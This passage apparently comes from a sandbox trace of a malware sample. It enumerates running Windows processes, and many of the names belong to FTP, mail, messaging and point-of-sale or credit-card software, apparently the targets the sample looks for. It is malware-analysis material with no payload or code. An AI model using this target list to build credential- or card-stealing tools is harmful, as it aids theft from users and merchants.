th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0184.514] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0184.516] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0184.518] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0184.520] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0184.522] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0184.525] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0184.527] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0184.529] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0184.531] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0184.533] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0184.535] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0184.536] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0184.538] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0184.540] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0184.542] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0184.544] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0184.546] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0184.547] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0184.549] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0184.557] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0184.559] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0184.561] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0184.562] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0184.565] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0184.567] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0184.568] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0184.570] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0184.571] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0184.573] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0184.575] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0184.577] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0184.579] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0184.580] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0184.582] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0184.584] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0184.587] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0184.590] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0184.594] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0184.599] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0184.602] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0184.605] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0184.607] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0184.609] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0184.611] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0184.613] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0184.615] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0184.617] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0184.619] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0184.622] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0184.624] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0184.626] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0184.629] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0184.634] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0184.636] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0184.641] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0184.643] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0184.646] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0184.649] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0184.652] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0184.654] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0184.657] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0184.660] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0184.662] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0184.665] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0184.666] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0184.668] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0184.673] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0184.675] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0184.677] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0184.679] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0184.681] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0184.683] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0184.685] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0184.687] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0184.688] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0184.690] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0184.692] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0184.694] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0184.696] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0184.699] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0184.701] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0184.704] Process32Next (in: hSnapshot=0x31c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 0 [0184.706] CloseHandle (hObject=0x31c) returned 1 [0184.706] Sleep (dwMilliseconds=0x64) [0184.817] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x195c [0184.832] Process32First (in: hSnapshot=0x195c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0184.834] Process32Next (in: hSnapshot=0x195c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x72, 